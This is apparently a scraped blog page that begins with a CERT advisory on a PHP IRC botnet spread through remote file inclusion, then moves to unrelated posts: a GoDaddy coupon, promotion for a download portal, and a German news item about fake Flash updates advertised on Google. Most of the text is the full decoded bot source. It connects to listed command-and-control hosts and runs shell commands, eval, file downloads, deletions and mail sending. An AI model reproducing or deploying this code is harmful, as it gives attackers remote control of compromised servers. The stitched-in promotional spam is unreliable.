new botnet on the rise
IUT-CERT has received some reports on suspicious link request on HTTP 404 web server log file. All get parameters values were requested with the value of http://babyc***b.fortunecity.co.uk/index.htm. Visiting the suspicious site, we found a PHP malcode that was encrypted by the malicious attacker. After decrypting the code, we found that the attacker is trying to exploit remote file inclusion vulnerability that is why she is trying to inject the code in web site variables. Successful exploitation of this vulnerability leads to execution of the malcode on the vulnerable server.
After execution of the malcode, the code is trying to initialize a connection to one of the following sockets:
homelessman.weedns.com:8080
burningman.weedns.com:8080
ballslessman.weedns.com:8080
mcar.dd.blueline.be:8080
mcarlos.opendns.be:8080
ns10.suroot.com:8080
mcarlos.dnip.net:8080
ns03.americanunfinished.com:8080
After the successful connection, the Bot sends a random number, password and the nickname to bot handler and waits for commands. These Bot nets are also used for further organized attack such as Distributed Denial of Service. It’s recommended to all Network administrators to filter the above connections.
Exploit more decodet
<?
/* Run the script as unrestricted as possible from within PHP */
set_time_limit(0);
ini_set("max_execution_time",0);
set_magic_quotes_runtime(0);
ini_set('output_buffering',0);
error_reporting(0);
ignore_user_abort();
/* Strip spaces from the string */
function f_stripspaces($x)
{
$x = str_replace(" ", "", $x);
return $x;
}
/* Base64-decode (with space stripping) */
function f_b64decode($x)
{
$x = base64_decode(f_stripspaces($x));
return $x;
}
/*
* An array of options/parameters
*/
$nec12e0af93cb5 = array (
"po" => 8080, // A port number, but what for?
"sp" => "uJijk4iVsIXRmQ==", // "secretpass"
"ch" => "aFZtlg==", // "##-u"
"ke" => "hniT", // "AES"
"ha" => "dG1qQk1halK/nE6N", // "/:*!*@*.av$/"
"pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", // "9dd4e461268c8034f5c8564e155c67a6"
"tr" => "*",
"mrnd" => 9,
"mo" => "cqtrig==", // "-x+i"
"ve" => "dmFyWIc=" // "1.27d"
);
function vfc35fdc70d5fc()
{
global $nec12e0af93cb5;
$mee11cbb19052e = array();
$nd707b8140a662 = "";
/* Looks like an array of hostnames */
$t59b514174bffe = array(
"raKtho+Gs5fLh5iMnaWIiI+zUYSvkA==", // "homelessman.weedns.com"
"p6iyj4yPp5G/lFjVi6WHkpRuhpCt", // "burningman.weedns.com"
"p5SsjZaNpZfRk4vMVLeIiYWulk+jko4=", // "ballslessman.weedns.com"
);
shuffle($t59b514174bffe);
if(($k351a1d2ad68bc = fsockopen(f_decrypt($t59b514174bffe[0]),$nec12e0af93cb5['po'],$a70106d0d82151,$p809b1abe3f111,15)))
{
$a8052146769b14 = pd988971435842($nec12e0af93cb5['mrnd']);
if (strlen($nec12e0af93cb5['sp'])>0)
{
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UEFTUw==")." ".f_decrypt($nec12e0af93cb5['sp']));
}
s56eacb300613d($k351a1d2ad68bc, f_b64decode("VVNFUg==")." ".rfb0daa8f01135($nec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$a8052146769b14");
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
while (!feof($k351a1d2ad68bc))
{
$g7fabc1404929c = trim(fgets($k351a1d2ad68bc,512));
$x6e2baaf3b97db = explode(" ",$g7fabc1404929c);
if(($g7fabc1404929c == $nd707b8140a662))
continue;
if (isset($x6e2baaf3b97db[0]) && $x6e2baaf3b97db[0] == f_b64decode("UElORw=="))
{
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UE9ORw==")." ".$x6e2baaf3b97db[1]);
}
else if (isset($x6e2baaf3b97db[1]) && $x6e2baaf3b97db[1] == f_b64decode("MDAx"))
{
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TU9ERQ==")." $a8052146769b14 ".f_decrypt($nec12e0af93cb5['mo']));
s56eacb300613d($k351a1d2ad68bc, f_b64decode("Sk9JTg==")." ".f_decrypt($nec12e0af93cb5['ch'])." ".f_decrypt($nec12e0af93cb5['ke']));
}
else if(isset($vdfff0a7fa1a55[1]) && $vdfff0a7fa1a55[1] == f_b64decode("NDMz"))
{
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
}
else if (isset($x6e2baaf3b97db[1]) && isset($mee11cbb19052e[$x6e2baaf3b97db[1]]))
{
unset($mee11cbb19052e[$x6e2baaf3b97db[1]]);
}
else if (isset($x6e2baaf3b97db[1]) && ($x6e2baaf3b97db[1] == f_b64decode("UFJJVk1TRw==") || $x6e2baaf3b97db[1] == "332"))
{
$f78e731027d8fd = strstr($g7fabc1404929c," :");
$f78e731027d8fd = substr($f78e731027d8fd,2);
$vdfff0a7fa1a55 = explode(" ",$f78e731027d8fd);
$k67b3dba8bc677 = $x6e2baaf3b97db[0];
$u7c6483ddcd99e = explode("!",$k67b3dba8bc677);
$u7c6483ddcd99e = substr($u7c6483ddcd99e[0],1);
$u73be252ca8221 = FALSE;
if ($vdfff0a7fa1a55[0] == "\1".f_b64decode("VkVSU0lPTg==")."\1")
{
s56eacb300613d($k351a1d2ad68bc,"NOTICE ".$u7c6483ddcd99e." :\1".f_b64decode("VkVSU0lPTg==")." ".f_decrypt($nec12e0af93cb5['ve'])."\1");
}
for ($c865c0c0b4ab0e=0;$c865c0c0b4ab0e<count($vdfff0a7fa1a55);$c865c0c0b4ab0e++)
{
if($vdfff0a7fa1a55[$c865c0c0b4ab0e] == "-s")
{
$u73be252ca8221 = TRUE;
}
}
if ($x6e2baaf3b97db[1] == "332")
{
$j01b6e20344b68 = $x6e2baaf3b97db[3];
}
elseif ($x6e2baaf3b97db[2] == $a8052146769b14)
{
$j01b6e20344b68 = $u7c6483ddcd99e;
}
else
{
$j01b6e20344b68 = $x6e2baaf3b97db[2];
}
if ($vdfff0a7fa1a55[0] == PHP_OS)
{
array_shift($vdfff0a7fa1a55);
}
if (substr($vdfff0a7fa1a55[0],0,1) == $nec12e0af93cb5['tr'])
{
if (isset($mee11cbb19052e[$k67b3dba8bc677]) || $x6e2baaf3b97db[1] == "332")
{
switch (substr($vdfff0a7fa1a55[0],1))
{
case d69923efad5b7a("sKM="):
if ($x6e2baaf3b97db[1] != "332")
{
$mee11cbb19052e[$k67b3dba8bc677] = FALSE;
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, htmen("b3V0"));
}
break;
case d69923efad5b7a("qGWaoKKb"):
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UVVJVCA6SSBRVUlU"));
fclose($k351a1d2ad68bc);
exit(0);
break;
case d69923efad5b7a("tpWs"):
if (count($vdfff0a7fa1a55)>1)
{
s56eacb300613d($k351a1d2ad68bc, substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])));
}
break;
case d69923efad5b7a("sKc="):
if (isset($vdfff0a7fa1a55[1]))
{
$q954eef6d6eac5 = $vdfff0a7fa1a55[1];
}
else
{
$q954eef6d6eac5 = getcwd();
}
if (is_dir($q954eef6d6eac5))
{
if (($w736007832d216 = opendir($q954eef6d6eac5)))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$q954eef6d6eac5."\2");
while (($f435ed7e9f07f7 = readdir($w736007832d216)) !== FALSE)
{
if ($f435ed7e9f07f7 != "." && $f435ed7e9f07f7 != "..")
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
"> (".filetype($q954eef6d6eac5."/".$f435ed7e9f07f7).") $f435ed7e9f07f7");
sleep(1);
}
}
closedir();
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$q954eef6d6eac5."\2");
}
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RGlyLy8=") . " \2".$q954eef6d6eac5."\2 " . f_b64decode("aXMgbm90IGEgZGlyIQ=="));
}
break;
case d69923efad5b7a("p5Wp"):
if (count($vdfff0a7fa1a55) > 1)
{
if (is_file($vdfff0a7fa1a55[1]))
{
if (($x0666f0acdeed3 = fopen($vdfff0a7fa1a55[1],"r")))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$vdfff0a7fa1a55[1]."\2");
while(!feof($x0666f0acdeed3))
{
$v6438c669e0d0d = trim(fgets($x0666f0acdeed3,256));
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, "> $v6438c669e0d0d");
sleep(1);
}
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, "> [EOF]");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$vdfff0a7fa1a55[1]."\2 for reading.");
}
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0FULy8=") . " \2".$vdfff0a7fa1a55[1]."\2 " . f_b64decode("aXMgbm90IGEgZmlsZQ=="));
}
}
break;
case d69923efad5b7a("tKuZ"):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
break;
case d69923efad5b7a("p5g="):
if (count($vdfff0a7fa1a55) > 1)
{
if (chdir($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$vdfff0a7fa1a55[1]);
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
}
}
break;
case d69923efad5b7a("tqE="):
if (count($vdfff0a7fa1a55) > 1)
{
if (unlink($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk0vLyBEZWxldGVk") . " \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
case d69923efad5b7a("uKOqlZs="):
if (count($vdfff0a7fa1a55) > 1)
{
if (touch($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("VG91Y2gvLyBUb3VjaGVk") . " \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
case d69923efad5b7a("t62inpySoA=="):
if (count($vdfff0a7fa1a55) > 2)
{
if (symlink($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$vdfff0a7fa1a55[2]."\2 To \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$vdfff0a7fa1a55[2]."\2 To \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
case d69923efad5b7a("p5ykqaE="):
if (count($vdfff0a7fa1a55) > 2)
{
if (chown($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2hvd24vLyBDaG93bmVk") ." \2".$vdfff0a7fa1a55[1]."\2 To \2".$vdfff0a7fa1a55[2]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$vdfff0a7fa1a55[1]."\2 To \2".$vdfff0a7fa1a55[2]."\2");
}
}
break;
case d69923efad5b7a("p5yioZc="):
if (count($vdfff0a7fa1a55) > 2)
{
if(chmod($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$vdfff0a7fa1a55[1]."\2 with permissions \2".$vdfff0a7fa1a55[2]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
case d69923efad5b7a("sZ+Zm6U="):
if (count($vdfff0a7fa1a55) > 1)
{
if (mkdir($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
case d69923efad5b7a("tqGZm6U="):
if (count($vdfff0a7fa1a55)>1)
{
if (rmdir($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
case d69923efad5b7a("p6Q="):
if (count($vdfff0a7fa1a55) > 2)
{
if (copy($vdfff0a7fa1a55[1], $vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q1AvLyBDb3BpZWQ=") ." \2".$vdfff0a7fa1a55[1]."\2 to \2".$vdfff0a7fa1a55[2]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$vdfff0a7fa1a55[1]."\2 to \2".$vdfff0a7fa1a55[2]."\2");
}
}
break;
case d69923efad5b7a("sZWeng=="):
if (count($vdfff0a7fa1a55)>4)
{
$l099fb995346f3 = "From: <".$vdfff0a7fa1a55[2].">\r\n";
if (mail($vdfff0a7fa1a55[1], $vdfff0a7fa1a55[3], substr($f78e731027d8fd,$vdfff0a7fa1a55[4]), $l099fb995346f3))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TWFpbC8v") . " Message sent to \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TWFpbC8v") . " Send failure");
}
}
break;
case d69923efad5b7a("sZ+ilmg="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TUQ1Ly8=") . " ".md5($vdfff0a7fa1a55[1]));
break;
case d69923efad5b7a("qKKo"):
if (isset($vdfff0a7fa1a55[1]))
{
$q957b527bcfbad = explode(".",$vdfff0a7fa1a55[1]);
if (count($q957b527bcfbad)==4 && is_numeric($q957b527bcfbad[0]) && is_numeric($q957b527bcfbad[1])
&& is_numeric($q957b527bcfbad[2]) && is_numeric($q957b527bcfbad[3]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RE5TLy8=") . " ".$vdfff0a7fa1a55[1]." -> ".gethostbyaddr($vdfff0a7fa1a55[1]));
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RE5TLy8=") . " ".$vdfff0a7fa1a55[1]." -> ".gethostbyname($vdfff0a7fa1a55[1]));
}
}
break;
case d69923efad5b7a("tpmoppSWqQ=="):
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UVVJVCA6UVVJVC4uLg=="));
fclose($k351a1d2ad68bc);
vfc35fdc70d5fc();
break;
case d69923efad5b7a("tqI="):
if(isset($vdfff0a7fa1a55[1]))
{
$a8052146769b14 = pd988971435842((int)$vdfff0a7fa1a55[1]);
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
}
else
{
$a8052146769b14 = pd988971435842($nec12e0af93cb5['mrnd']);
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
}
break;
case d69923efad5b7a("tJyl"):
if (count($vdfff0a7fa1a55) > 1)
{
eval(substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])));
}
break;
case d69923efad5b7a("q5mp"):
if (count($vdfff0a7fa1a55) > 2)
{
if (!($x0666f0acdeed3 = fopen($vdfff0a7fa1a55[2],"w")))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
}
else
{
if (!($zb5eda0a74558a = file($vdfff0a7fa1a55[1])))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
}
else
{
for ($c865c0c0b4ab0e = 0; $c865c0c0b4ab0e < count($zb5eda0a74558a); $c865c0c0b4ab0e++)
{
fwrite($x0666f0acdeed3,$zb5eda0a74558a[$c865c0c0b4ab0e]);
}
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("R2V0Ly8=") . " \2".$vdfff0a7fa1a55[1]."\2 downloaded to \2".$vdfff0a7fa1a55[2]."\2");
}
fclose($x0666f0acdeed3);
}
}
break;
case d69923efad5b7a("sp0="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break;
case d69923efad5b7a("t50="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("U3lzaW5mby8v")
. " [User: ".get_current_user()."] [PID: ".getmypid()
."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: "
.$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: "
.$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: "
.$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break;
case d69923efad5b7a("tKOnpqKUmuw="):
if (isset($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
if (fsockopen($vdfff0a7fa1a55[1],(int)$vdfff0a7fa1a55[2],$r56bd7107802eb,$t341be97d9aff9,5))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
"".f_b64decode("UG9ydENoay8v") ." ".$vdfff0a7fa1a55[1].":".$vdfff0a7fa1a55[2]." is \2Open\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
"".f_b64decode("UG9ydENoay8v") ." ".$vdfff0a7fa1a55[1].":".$vdfff0a7fa1a55[2]." is \2Closed\2");
}
}
break;
case d69923efad5b7a("uaKWn5g="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("VW5hbWUvLw==")." " .php_uname());
break;
case d69923efad5b7a("rZg="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("SUQvLw==")." ".getmypid());
break;
case d69923efad5b7a("p6GZ"):
if (count($vdfff0a7fa1a55)>1)
{
$m1dccadfed7bcb = popen(substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])),"r");
while (!feof($m1dccadfed7bcb))
{
$f734515cbd3636 = trim(fgets($m1dccadfed7bcb,512));
if (strlen($f734515cbd3636)>0)
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, "> ".$f734515cbd3636);
sleep(1);
}
}
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("PiBbRU9GXQ=="));
}
break;
case d69923efad5b7a("qayalaiYmg=="):
t54d54a126a783(substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])));
break;
}
}
else
{
switch(substr($vdfff0a7fa1a55[0],1))
{
case d69923efad5b7a("bg=="):
if (isset($vdfff0a7fa1a55[1]) && md5($vdfff0a7fa1a55[1]) == f_decrypt($nec12e0af93cb5['pa'])
&& preg_match(f_decrypt($nec12e0af93cb5['ha']),$k67b3dba8bc677))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("UmVhZHkvLyBPaw=="));
$mee11cbb19052e[$k67b3dba8bc677] = TRUE;
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, FALSE, f_decrypt($nec12e0af93cb5['ch']), f_b64decode("UmVhZHkvLyByZWplY3RlZA=="));
}
break;
}
}
}
}
$nd707b8140a662 = $g7fabc1404929c;
}
fclose($k351a1d2ad68bc);
sleep(3);
vfc35fdc70d5fc();
}
else
{
shuffle($t59b514174bffe);
vfc35fdc70d5fc();
}
}
function s56eacb300613d($s317d37b0edc7b, $f78e731027d8fd)
{
fwrite($s317d37b0edc7b,"$f78e731027d8fd\r\n");
}
function lf2f4e964f79d0($s317d37b0edc7b, $u73be252ca8221, $j01b6e20344b68, $f78e731027d8fd)
{
if($u73be252ca8221 != TRUE)
{
s56eacb300613d($s317d37b0edc7b, f_b64decode("UFJJVk1TRw==")." $j01b6e20344b68 :$f78e731027d8fd");
}
}
function d69923efad5b7a($ic7a1ddb19daba)
{
$db4a88417b3d01 = '';
$ic7a1ddb19daba = base64_decode($ic7a1ddb19daba);
for($c865c0c0b4ab0e=0; $c865c0c0b4ab0e<strlen($ic7a1ddb19daba); $c865c0c0b4ab0e++)
{
$ya87deb01c5f53 = substr($ic7a1ddb19daba, $c865c0c0b4ab0e, 1);
$cae0e1268c3859 =
substr(f_b64decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3"
."JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="),
($c865c0c0b4ab0e % strlen(f_b64decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU"
."3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
$ya87deb01c5f53 = chr(ord($ya87deb01c5f53)-ord($cae0e1268c3859));
$db4a88417b3d01 .= $ya87deb01c5f53;
}
return $db4a88417b3d01;
}
function pd988971435842($yfac65290966c7)
{
for ($c865c0c0b4ab0e = 0; $c865c0c0b4ab0e < $yfac65290966c7; $c865c0c0b4ab0e++)
$e2cb9df9898e55 .= chr(mt_rand(0,25)+97);
if (posix_getegid() == 0)
$e2cb9df9898e55 = "r-".$e2cb9df9898e55;
return $e2cb9df9898e55;
}
function t54d54a126a783($o111ca5df4a68b)
{
$o9b207167e5381 = '';
if (!empty($o111ca5df4a68b))
{
if(function_exists('exec'))
{
@exec($o111ca5df4a68b,$o9b207167e5381);
$o9b207167e5381 = join("\n",$o9b207167e5381);
}
elseif(function_exists('shell_exec'))
{
$o9b207167e5381 = @shell_exec($o111ca5df4a68b);
}
elseif(function_exists('system'))
{
@ob_start();
@system($o111ca5df4a68b);
$o9b207167e5381 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($o111ca5df4a68b);
$o9b207167e5381 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($u8fa14cdd754f9 = @popen($o111ca5df4a68b,"r")))
{
$o9b207167e5381 = "";
while(!@feof($u8fa14cdd754f9))
{
$o9b207167e5381 .= @fread($u8fa14cdd754f9,1024);
}
@pclose($u8fa14cdd754f9);
}
}
return $o9b207167e5381;
}
/*
* Base64-decode + decrypt using an addition cipher
*/
function f_decrypt($in)
{
$key = "M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU=";
$out = '';
$in = base64_decode($in);
for($i=0; $i<strlen($in); $i++)
{
$tmp = substr($in, $i, 1);
$x = substr(f_b64decode($key), ($i % strlen(f_b64decode($key))) - 1, 1);
$tmp = chr(ord($tmp)-ord($x));
$out.=$tmp;
}
return $out;
}
function rfb0daa8f01135($yfac65290966c7)
{
$e2cb9df9898e55 = "";
for ($c865c0c0b4ab0e=0;$c865c0c0b4ab0e<$yfac65290966c7; $c865c0c0b4ab0e++)
$e2cb9df9898e55 .= chr(mt_rand(0,25)+97);
return $e2cb9df9898e55;
}
vfc35fdc70d5fc();
?>
GoDADDY Domains just for $ 1,99 COUPON CODE 119TEST
GoDaddy is offering 1-Year Domain Name Registration for $1.99 with code 199TEST
20-cent ICANN fee applies, making it $2.19 per domain!
confirmed: .us
confirmed: .com
confirmed: .org
confirmed: .net
Works only once per account godaddy-coupon 199TEST
New Free Software Archive
recently i was surfing the web while i found an interesting free Software download Portal its www.4infos.net http://www.4infos.net/
I have been involved in internet marketing for many years, and have never seen such an easy way to set up content oriented sites in such a quick, eye appealing and affordable way, and the sites are all set up with great appeal to the se's as well.
A high-ranking portal can potentially earn you hundreds of dollars in monthly
this Portal is split into Download categories
- Business and Finance software http://www.4infos.net/get-business-and-finance-1_14.html
- Audio Software http://www.4infos.net/get-audio-1_3.html
- PC Enhancements Software http://www.4infos.net/get-pc-enhancements-1_26.html
- Games http://www.4infos.net/get-games-1_40.html
- Home and education Software http://www.4infos.net/get-home-and-education-1_53.html
- Internet related Software http://www.4infos.net/get-internet-1_70.html
- Multimedia and Design Software http://www.4infos.net/get-multimedia-and-design-1_83.html
- Software Development http://www.4infos.net/get-software-development-1_91.html
- Utilities http://www.4infos.net/get-utilities-1_103.html
- Web authoring Software http://www.4infos.net/get-web-authoring-1_119.html
Let's give it a try!
Labels: Download, Free, Portal, Software
Google-adsense wird als Malware-Schleuder missbraucht
Adobe hat vor teils gefährlichen Sicherheitslücken im Flash Player 9 gewarnt. Nutzer sollen auf die aktuelle Version 10.0.12.36 updaten. Dies haben sich Gauner zunutze gemacht und einen Adware-Schädling entwickelt, der sich als Update auf Flash Player 10 ausgibt. Zur Verbreitung ihres Produkts nutzen die Täter Werbeschaltungen bei Google. Mehrere Security-Unternehmen warnen vor dem Aufruf der dort verlinkten Webseiten.
Wer in den deutschsprachigen Versionen von Google nach "Flash Player", "Flash Player Update", "Flash Player 10" und ähnlichen Begriffen sucht, erhält direkt oberhalb der Suchergebnisse oder rechts davon Werbung eingeblendet. "Adobe Flash Player 10", heißt es dort, "Die Neueste Version steht jetzt zum kostenlosen Download bereit." Die ordentlich gestalteten Webseiten bietet eine Datei namens flash10_setup.exe zum Download an.
Wer dieses Programm installiert, bekommt aber nicht das von Adobe empfohlene Flash-Update, sondern handelt sich einen Schädling ein. Dieser wird derzeit nur von wenigen Virenscannern erkannt. Dem österreichischen Unternehmen Ikarus zufolge handelt es sich um Adware, also Software, die unerwünschte Werbung einblendet
[Update]
Am heutigen Samstag Abend erklärte Lena Wagner, Sprecherin von Google Deutschland, gegenüber heise online: "Selbstverständlich erlauben unsere AdWords-Geschäftsbedingungen Werbetreibenden nicht, Webseiten, die Viren enthalten, zu bewerben. Wenn wir entdecken, dass solche Anzeigen erscheinen, entfernen wir diese."
Quelle: http://www.heise.de/security/Google-Werbung-wird-als-Malware-Schleuder-missbraucht-Update--/news/meldung/117564
Wer in den deutschsprachigen Versionen von Google nach "Flash Player", "Flash Player Update", "Flash Player 10" und ähnlichen Begriffen sucht, erhält direkt oberhalb der Suchergebnisse oder rechts davon Werbung eingeblendet. "Adobe Flash Player 10", heißt es dort, "Die Neueste Version steht jetzt zum kostenlosen Download bereit." Die ordentlich gestalteten Webseiten bietet eine Datei namens flash10_setup.exe zum Download an.
